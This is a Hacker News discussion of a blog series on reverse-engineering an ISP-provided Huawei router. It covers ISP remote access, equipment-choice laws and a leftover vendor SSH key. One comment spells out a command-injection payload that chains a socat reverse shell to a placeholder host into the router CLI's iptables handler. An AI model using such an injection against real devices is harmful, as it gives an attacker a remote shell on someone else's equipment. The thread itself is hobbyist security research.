
A detailed look at the router provided by my ISP - paddlesteamer
https://0x90.psaux.io/2020/03/01/Taking-Back-What-Is-Already-Yours-Router-Wars-Episode-I/
======
blakesterz
Interesting read! There's actually 3 parts to this:

Part 2: [https://0x90.psaux.io/2020/03/19/Taking-Back-What-Is-
Already...](https://0x90.psaux.io/2020/03/19/Taking-Back-What-Is-Already-
Yours-Router-Wars-Episode-II/)

And 3: [https://0x90.psaux.io/2020/03/22/Taking-Back-What-Is-
Already...](https://0x90.psaux.io/2020/03/22/Taking-Back-What-Is-Already-
Yours-Router-Wars-Episode-III/)

Summary from the end of Part 3:

"So we managed to change passwords for both ssh and telnet, gain access to
Root user for the web interface, changed that password too. We changed ACS URL
to ours and remove the IP restrictions. To put it simply, we cleaned up our
router from our ISP. Good for our privacy."

~~~
sheep-a
You forgot this bit of the summary, which I think is more interesting!

"Still there is an authorized ssh key left in the firmware but for now it’s
enough that we’re keeping the ISP out. Maybe in the future, we can repack the
firmware with our configuration and keys and install it on the router. For
now, take care!"

------
jason0597
It's funny to think that if you were to report all of your findings to your
local newspaper (Turkish newspaper in this case), as to how Turkish ISPs have
complete access to your router or how Huawei (China) has an SSH key for your
router, people would go absolutely ballistic. But for us it's just another day
of expected craziness and we're tired of talking about it

~~~
0xff00ffee
I'm pretty sure my new CenturyLInk fiber router is similar. I tried to create
a PPoE connection from my WRT1900 direclty to century link using the same
credentials and I couldn't connect to my internet. However, now I am motivated
to create a bridge and find out why.

For CenturyLink fiber I have two boxes:

Box A: the exterior fiber enters this box, the tech said it was a
"translator"; and the port 4 ethernet on it goes to ...

Box B: the centurylink wireless router, which performs the PPoE with my
credentials which were somehow hardwired because no one ever told me my
username/password. I'm guesing TR-069? Then port 4 on this goes to ...

Box C: MY WRT1900AC, which then goes to other subnets for my cameras, lab, and
office.

I figured Box B was redundant, but trying to remove it has been problematic.

~~~
Tourus
> PPoE with my credentials which were somehow hardwired because no one ever
> told me my username/password

They make it very hard to use your own "Box B", but I've set this up twice now
(most recently last week). Get the username and password from CenturyLink (the
tech that installs the service has this, or call them). Then, google search
"century link vlan 201 wan tag". The trick is you need a router that has this
functionality, most basic consumer ones don't.

Unfortunately, even if you follow all directions and it still doesn't work
troubleshooting is a nightmare, very little or no help from their customer
support.

~~~
0xff00ffee
Ah I see. My WRT1900AC doesn't have that option. I was running OpenWRT but ran
into some issues and panicked back to the default firmware. Now that I have
another wireless router I might dare it again.

~~~
jacob019
OpenWRT is fantastic when you get used to it. I prefer the CLI but the GUI
works well too.

------
LeonM
In the Netherlands we now have a law where ISPs must allow your own choice of
network equipment. This means they must give you the required information on
how to connect your own device with their network.

I have a fiber connection, which I connected directly to a Ubiquity router
through a suitable SFP module. My ISP supplied the information on the fiber
type and which VLAN ID's to setup for internet, TV and telephony.

This way I have my own equipment, that I control myself. The 'modem' [0] which
my ISP supplied is still in its original, unopened box.

~~~
lima
Same in Germany! ISPs hate it because it it makes their lives a lot harder -
in cable networks, they now have to deal with a zoo of endpoints on a shared
medium vs. a small set of standardized devices.

As a customer, I like it.

~~~
pdonis
_> ISPs hate it because it it makes their lives a lot harder - in cable
networks, they now have to deal with a zoo of endpoints on a shared medium vs.
a small set of standardized devices._

In other words, ISPs hate it because it forces them to actually do their jobs
and be ISPs. The Internet itself is "a zoo of endpoints on a shared medium",
and ISP stands for _Internet_ Service Provider.

~~~
josephmosby
It's not the provision of Internet that's the problem, it's the customer
service requests.

e.g., AT&T could provide perfect service to the home endpoint, but the
customer bought some aftermarket router from their cousin, who had configured
it for Verizon. Customer calls AT&T to holler. Tier 1 support doesn't know
what that particular router config GUI even looks like, so it gets bumped to
T2 or T3. Ultimately to find out that the customer's cousin had hardcoded DNS
to some internal Verizon system that's not visible to AT&T.

Repeat x100K. ISPs job isn't just "provide the Internet," it's also "provide
all the troubleshooting for every non-technical customer who just wants to
watch Netflix but doesn't even know what a router is"

~~~
pdonis
_> ISPs job isn't just "provide the Internet," it's also "provide all the
troubleshooting for every non-technical customer who just wants to watch
Netflix but doesn't even know what a router is"_

No ISP that I'm aware of will provide troubleshooting for devices they don't
own. They just say "sorry, not our device, not our problem". When I installed
my own cable modem and router, Comcast was quite clear about that. And I said
"fine, no problem".

~~~
iagovar
The ISP I work for does, and it's a very large one (not in the US). If a
router is not ours, we check for sync or if PPPoE is up. We tell the customer
what's the result of our tests and offer a technician if they are willing to
pay in case it's not our fault.

Most people are unwilling to pay, and yell at customer service. Most of the
times, specially when the router has sync it's customer fault.

~~~
the8472
> we check for sync or if PPPoE is up.

The problem with this kind of procedure is that it's only a reasonable way to
locate the problem when there are problems at that very moment. You're getting
stonewalled when - during the day - you're reporting that it frequently loses
sync during the night.

~~~
iagovar
We can track sync changes, or really almost anything, crc errors, traffic,
whatever we want really, although we only do it on demand.

You put a customer ID in the tracking system an it queries and stores results.
It also performs analysis automatically, but most cases just puts the result
in a frontend for analysis.

------
non-entity
A while back, I was playing around with the cable modem / router the ISP gave
me because I was curious and an idiot. After screwing around a bit, I managed
to find a vulnerability that exposed technician credentials plaintext and they
actually worked. Had no idea where to report it though, because the
manufacturers contact page could be summed up as _fuck you we don 't talk
directly to consumers_. I dont think the vulnerability was that bad, as you
had to be logged in to the web interface already with another account, but
still.

I don't really trust ISP provided hardware / software now though.

~~~
praptak
The right thing to do in such circumstances is to publish the vulnerability.

~~~
ProZsolt
But how do you publish it without the liability of getting sued? A person like
me who don't work in security still occasionally find some vulnerability.
Sometimes you get angry emails from the company even if you just try to warn
them.

~~~
jeroenhd
If you think they'd sue, you can always send the details to a tech journalist
specialized in such matters (someone with a proven track record of protecting
their sources). Use an anonymous email service to be sure.

If something goes wrong, they'll take the thread of legal action and probably
win. Companies know that suing journalists often leads to more bad press than
cooperating. They can even try to contact the company in question for you if
the vulnerability is bad enough.

If the company doesn't respond or get their shit together, journalists will
get a scoop and the company is forced to fix their shit. If the company does
fix their shit, the journalist will still get a story out of it and you can
rest easy that you've helped make the internet just a little bit safer for
everyone.

------
miki123211
Apparently a polish carrier called Multimedia has recently introduced a new,
revolutionary service for some customers. It's called "set up a custom wi-fi
configuration", and it's just 5 pln (a little over $1)! It lets you think up
of a ssid and password, and configure your router to use those! That's an
amazing invention, isn't it? /s

Some customers apparently have absolutely no access to their routers, not even
to the web interface, and they can't use their own either. All reconfiguration
must be done through the customer service portal or by phone. That means the
carrier can change for every little thing, including changing the Wi-Fi
config! I'm not sure if you can even bridge, but I guess not. Note that this
does not affect all customers of that carrier, just a minority.

~~~
gbrown
Couldn't you just daisy chain a second router via Ethernet and use it? Bonus
points for VPN-ing all of your traffic.

~~~
the8472
Daisy-chaining routers is can severely degrade some services (gaming, p2p) due
to NAT. Assuming the ISP-provided one supports PCP or UPnP-IGD you need a
client on your own router that relays port forwarding configuration to the
upstream router. This is possible but may need non-trival setup.

~~~
pathseeker
PCP that allows ingress connections without an established egress connection
is rarely enabled. The same applies to UPnP because of the baddies.

[https://en.wikipedia.org/wiki/Port_Control_Protocol#Security](https://en.wikipedia.org/wiki/Port_Control_Protocol#Security)

------
davedx
Fantastic write up from a hacking point of view. I did wonder about this
statement though:

"This is very invasive and unacceptable. It may seem necessary to apply
security patches published by your ISP but the user should be able to disable
it whenever she wants."

Legally, at least in countries where I've lived, the ISP still owns the
router. This surprised me a bit when I first found out, but then I got used to
the idea, but you should treat any ISP or telecom gear in your house as
something that's "rented but still owned and controlled by someone else".

~~~
blacksmith_tb
True, but I think it's worth comparing it to other utilities in your home -
what if your electric company could make all your lightbulbs 20% dimmer
without notice? Or if your water heater was remotely administered? ISPs, like
mobile telcos, like to claim they must have control over your hardware "for
security" but I think the most charitable interpretation is that it's to make
their customer service dept. sweat less (more nefarious possibilities exist,
of course).

~~~
CJefferson
The difference is that non-updated routers can cause global problems. At the
very least as an ISP I'd want to say you can look after updates yourself, but
we will disable your access to the internet (other than to get the update from
us) whenever we try to push an update to you and you reject it.

------
mercora
it looks like this CLI has some hardcoded shell commands with variable
substitutions that look possibly unprotected against command injection.

For example

    
    
      iptables %s > %s 2>&1
    

could probably be executed as

    
    
      iptables -L; socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane > /var/IptablesInfo 2>&1
    

by issuing

    
    
      iptables -L; socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
    

and therefore it might be possible to get real shell access too.

~~~
paddlesteamer
Hello, OP here, I've actually spent considerable amount time to find a code
execution. I know you'll want to learn details of FUN_004122c0 but here is the
decompiled version of iptables part from ghidra:

undefined4 FUN_004045a0(int param_1,int _param_2)

{ int iVar1; int iVar2; char _pcVar3; char cVar4; code _pcVar5; undefined
auStack544 [256]; undefined auStack288 [260];

    
    
      FUN_00412530(auStack544,0,0x100);
      FUN_00412530(auStack288,0,0x100);
      if (param_1 == 0) {
        FUN_004122c0(auStack288,0x100,"iptables > %s 2>&1","/var/IptablesInfo");
      }
      else {
        iVar1 = FUN_00412210(0x100);
        if (iVar1 == 0) {
          return 0x40010009;
        }
        cVar4 = '\0';
        while ((iVar2 = *param_2, iVar2 != 0 && (cVar4 != '\x10'))) {
          if (cVar4 == '\0') {
            FUN_004122c0(iVar1,0x100,0x412c84,iVar2);
          }
          else {
            FUN_004122c0(iVar1,0x100,"%s %s",iVar1,iVar2);
          }
          cVar4 = cVar4 + '\x01';
          param_2 = param_2 + 1;
        }
        FUN_004122c0(auStack288,0x100,"iptables %s > %s 2>&1",iVar1,"/var/IptablesInfo");
        FUN_00412660(iVar1);
      }
      FUN_00412330(auStack288);
      iVar1 = FUN_004123c0("/var/IptablesInfo",0x414f68);
      if (iVar1 == 0) {
        pcVar5 = FUN_004126e0;
        pcVar3 = "Fail\r";
      }
      else {
        while (iVar2 = FUN_00412470(auStack544,0x100,iVar1), iVar2 != 0) {
          FUN_004126b0(0x412c84,auStack544);
          FUN_004121a0(0xd);
        }
        FUN_00412520(DAT_0042b010);
        FUN_004123a0(iVar1);
        pcVar5 = FUN_00412500;
        pcVar3 = "/var/IptablesInfo";
      }
      (*pcVar5)(pcVar3);
      return 0;

}

Any ideas?

~~~
mercora
i guess you already tried issuing commands like i mentioned?!

i am still confused by this code but to me it looks like this has been
originally written in another language but maybe this is just what it looks
like after de-compiling. seeing this function would likely be more
interesting.

~~~
paddlesteamer
Yep, I tried. No luck there

------
1_player
Very interesting article.

What about that precompiled .ssh/authorized_keys with user
z00163152@HUAWEI-627FB9A3 mentioned in Part 3?

Any reason why a router firmware would permit root access to anyone at all?
Definitely sounds like a backdoor to me.

~~~
skoskie
That was the worst part. I would have that bombshell as the lede. And then
delete it if possible.

------
zeroflow
...and that's why my ISPs router is running in modem mode with a non-ISP-
controlled router from Ubiquiti behind it - which I may replace with a pfSense
box in the future.

I'm pretty happy that my cable ISP is allowing this mode so I don't have to
double-NAT in my setup.

~~~
awelkie
If your ISP didn't have that feature, could you just replace the cable modem
too? My ISP's router is running EuroDOCSIS 3.0 and I'm wondering if I could
replace the router with a modem + router of my own.

~~~
zeroflow
Sadly I could not, since the ISP is defining the router as the endpoint of
it's network so there is no freedom to choose different models.

~~~
em-bee
practically though what is the difference between having the endpoint in a
shaft by the elevator or in your apartment or even down the street? in all
scenarios i'd put my own router behind the ISP equipment and run my local
network however i want.

the only issue is with getting a public ip address for inbound connections.

here we are not getting public ip addresses anyways, so the point is moot for
me. but if you do get one, then all they need to do is configure their router
to forward the public ip to yours.

in my case the ISP even installed two routers. one was theirs that i had no
access to and one was "ours" that i was able to configure as i liked or
replace with my own. both routers had their own wifi, but i don't use the one
from the ISP endpoint router

------
AdmiralAsshat
I never thought to nmap my own router until reading this.

    
    
      PORT      STATE SERVICE
      53/tcp    open  domain
      80/tcp    open  http
      631/tcp   open  ipp
      5000/tcp  open  upnp
      7777/tcp  open  cbt
      20005/tcp open  btx
    

Now begins the three-hours-and-counting rabbit hole of trying to figure out
what the hell is running on ports 7777 and 20005. Or why UPNP is apparently
running, despite UPNP being explicitly disabled on the Netgear router's admin
page.

~~~
manifoldgeo
Maybe it's a remote administration port for your ISP. I have a router provided
by Froniter, formerly Verizon FiOS, where port 4567 is always open and cannot
be closed with a firewall rule from the router's web UI (grayed out). After
some googling I found out that it's their maintenance port:
[https://www.speedguide.net/port.php?port=4567](https://www.speedguide.net/port.php?port=4567)

For a while I had my own OpenWRT router in place of the ISP one, but I think
they got wise to it and blocked the MAC. I changed it to match the ISP
router's MAC address, but it only worked for about 3 minutes before being
blocked again.

~~~
AdmiralAsshat
I bought both my modem and my router, so I'd be a little incredulous if my ISP
had somehow forced a port open on it.

The 20005 one _may_ be some port that NetGear uses for its USB Printing, I've
found some articles that mention it.

It also struck me that I hit it with nmap using the LAN IP, so perhaps these
are only open _within_ the network. I probably need to hit the external IP of
the router to see what is externally open. ShieldsUP! didn't show anything
unusual.[1]

EDIT: Disclosure of a vulnerability regarding port 20005[2], and Netgear
confirming that it does affect my router[3], but should have been fixed. I
assume the "fix" was fixing the buffer overflow vulnerability, rather than
closing the port altogether.

[1]
[https://www.grc.com/x/ne.dll?bh0bkyd2](https://www.grc.com/x/ne.dll?bh0bkyd2)

[2]
[https://www.kb.cert.org/vuls/id/177092/](https://www.kb.cert.org/vuls/id/177092/)

[3] [https://kb.netgear.com/28393/NETGEAR-Product-
Vulnerability-A...](https://kb.netgear.com/28393/NETGEAR-Product-
Vulnerability-Advisory-ReadySHARE)

------
lxe
> After looking into folders, I found some interesting files. I won’t go
> through them here but I want to mention just one of them: [$ cat
> etc/ssh/authorized_keys]. Maybe an engineer from Huawei (I assume
> z00163152@HUAWEI-627FB9A3) who owns a specific DSS key, can connect all
> HG253s routers without needing a password, who knows?

Who knows indeed?!

------
fulafel
Trivia: Strictly speaking a box that does NAT is not a router in the IP
protocol sense, it's a kind of proxy. The router requirements RFC explicitly
forbids altering most fields (incl the address field) in the IP header.

~~~
packet_nerd
The box in people's home's colloquially known as a router actually commonly
combines a lot of functions into one:

* router

* firewall

* NAT device

* modem

* switch

* access point

* DNS resolver

* DHCP server

And probably others I'm not thinking of :-)

~~~
sandov
ONT in the case of fiber. Don't know if it technically counts as a modem.

~~~
bobbob1921
Media converter maybe? (Like those $100 or so fiber to ethernet converters, I
say this as it’s usually a modem/router plugged into the ONT‘s ethernet port
that does isp to cpe authentication, tunneling, etc. so the ONT is just
converting fiber (from isps OLT) to ethernet for something more common to plug
into)

------
ege_erdogan
I am using the exact same router from the same ISP. I was wondering what the
problem was when I wasn't able to forward port 22 to my computer for an SSH
connection.

I had thought it had something to with the ISP allocating the same static IP
to multiple clients and blocking some common ports to prevent collisions
(ended up using port 109.. something for SSH). Turns out it was more
interesting!

------
jscholes
Enjoyed this write-up, but most of the exploration seemed to be facilitated by
someone having already leaked the CLI root password online. Anyone have
suggestions on how you might otherwise obtain that information?

~~~
paddlesteamer
Hi, OP here, actually it's not true. Think the scenario as this: you don't
have the CLI root password, you just do a MitM attack and learn about root
password when your ISP attempts to change it. This applies my situation, also
I could learn about the default password just by looking into the firmware.

------
j_h
EU net neutrality regulation grants end users right to use their own
equipment.

[https://fsfe.org/activities/routers/](https://fsfe.org/activities/routers/)

~~~
Someone1234
Turkey isn't in the EU.

~~~
anticensor
IANAL, but Turkcell would lose the case in Turkey too. This is not due to net
neutrality regulations (Turkey deliberately lacks it), but due to case law
arisen from competition and customer rights regulations. However, telcos work
around that too, by "leasing" modems, like telephone divisions did in the
past. Does the trick of "leasing" work in the EU too?

~~~
mercora
in marketing they try hard to make it sound like what you are going to get by
renting their device is WiFi not just the ability to turn on WiFi
functionality of the CPE. of course everybody wants that but most people don't
get that's not something that has to be provided by the ISP. I am not sure if
its required, but i have seen often a lower end device (without WiFi
accessible) is given for the lifetime of the contract free of charge.

in Germany you have the right to use a compatible device you own yourself.
However my ISP Vodafone does not accept lots of modems as compatible and when
this regulation started there were basically none you could actually buy. Its
not much better now i guess but i distress.

EDIT: reading your comment again the trick you mentioned probably works
because its "yours" when you lease it instead of renting it?

~~~
anticensor
Not instead of renting, but of selling.

------
mafuy
Many people here pointed out a problem: Removing access for the ISP and/or
device manufacturer means they cannot fix bugs remotely and automatically.
This is bad in situations like when the Mirai malware hit.

How about this?: "You can use your own device and we provide all required
information, but there will be no advanced support and you have to check for
bugfixes yourself monthly."

... now that I wrote it, I see the answer: There is no way to enforce this,
especially not reliably.

~~~
marcosdumay
Ok, from the Wikipedia:

> Mirai then identifies vulnerable IoT devices using a table of more than 60
> common factory default usernames and passwords

Taking control of the device is exactly the kind of thing that stops that
attack.

------
greatjack613
Finally some proof that Huawei does have back doors in their network
equipment.

In part 3 [https://0x90.psaux.io/2020/03/22/Taking-Back-What-Is-
Already...](https://0x90.psaux.io/2020/03/22/Taking-Back-What-Is-Already-
Yours-Router-Wars-Episode-III/) the author rights that a Huawei engineer has
an authorized ssh key that would allow them to access your router.

Just Wow!

------
gumby
I clicked through to the two follow ups — this is both excellent sleuthery and
a wonderful write up.

------
PascLeRasc
Slightly off-topic: I'd really like to run screenfetch on my router (Asus
RT-N66U), but it doesn't have enough free space to sftp the script to it [1].
Piping the script just freezes up. Does anyone know a good workaround? Has
anyone ever tried this?

[1] [https://unix.stackexchange.com/questions/510947/how-can-i-
ru...](https://unix.stackexchange.com/questions/510947/how-can-i-run-a-script-
on-a-unix-box-without-enough-space-to-store-it)

~~~
Topgamer7
Check if your router has tmpfs mounted. Iirc thats ram, it should probably
have enough space for you to upload it and run it from there.

------
hestefisk
My ISP (Internode) provide a ‘modem’ for my NBN hybrid coax / fibre
connection. I just put my OPNSense router in front of it and it’s all secure.
They provided me with all the config settings, which are a bit more obscure
than usual (PPPoE but on a specific vlan tag). Works like a charm and I don’t
have to worry about weird government wiretapping or backdoors. My ISP provide
an IPv6 range too, which is pretty cool.

------
Thaxll
You're lucky to have an SSH server active, on mine I had to open the router
and dump the firmware manually :/

------
skizm
My ISP has a cloud access "feature". If I go to 192.168.1.1 it redirects me to
their "router.MYISP.net" site. What's the best way to go about disabling this?
Should I just dump the rented router for my own?

~~~
simplyinfinity
asus (and others) have the same feature. In my case it's a simple redirect
from the ip of 192.168.1.1 to router.myasus.com which has a dns record of
192.168.1.1. so all it does is do a redirect to a domain.

------
tibbydudeza
Wow some good detective skills at work here , got a similar Huawei HG635 from
my provider ... kept it because it supports LTE cutover.

Fortunately some kind person leaked the admin password so that I could
configure it to my liking.

------
wyclif
I'm overseas now, and using one of these crappy ISP-provided routers. I miss
my nice Linksys router back home with high-density mesh, tri-band WiFi, and
four gigabit ethernet ports.

------
k__
The only router with good admin interface I ever had was one with open source
software.

Every other router, for 20 years now, had a slow and buggy web interface.

Why is this?!

------
0xff00ffee
Why did port 8015 show up on the remote system after resetting firmware?
Shouldn't nmap have reported that?

~~~
usmannk
It was a “fast nmap”, so only the top 100 most common ports were checked.

~~~
0xff00ffee
Ah, thanks. If nmap was run exhaustively on all 64k ports, would that both (a)
take forever, and (b) raise alarm bells on the target? Why isn't a full scan
the norm?

~~~
usmannk
Yes to both of those (but not thaaat long). But in this case I still would
have ran an exhaustive nmap because it's a device on my local network rather
than a remote server.

------
sloshnmosh
I very much enjoyed this! I bookmarked your site and hope to read more of your
posts in the future.

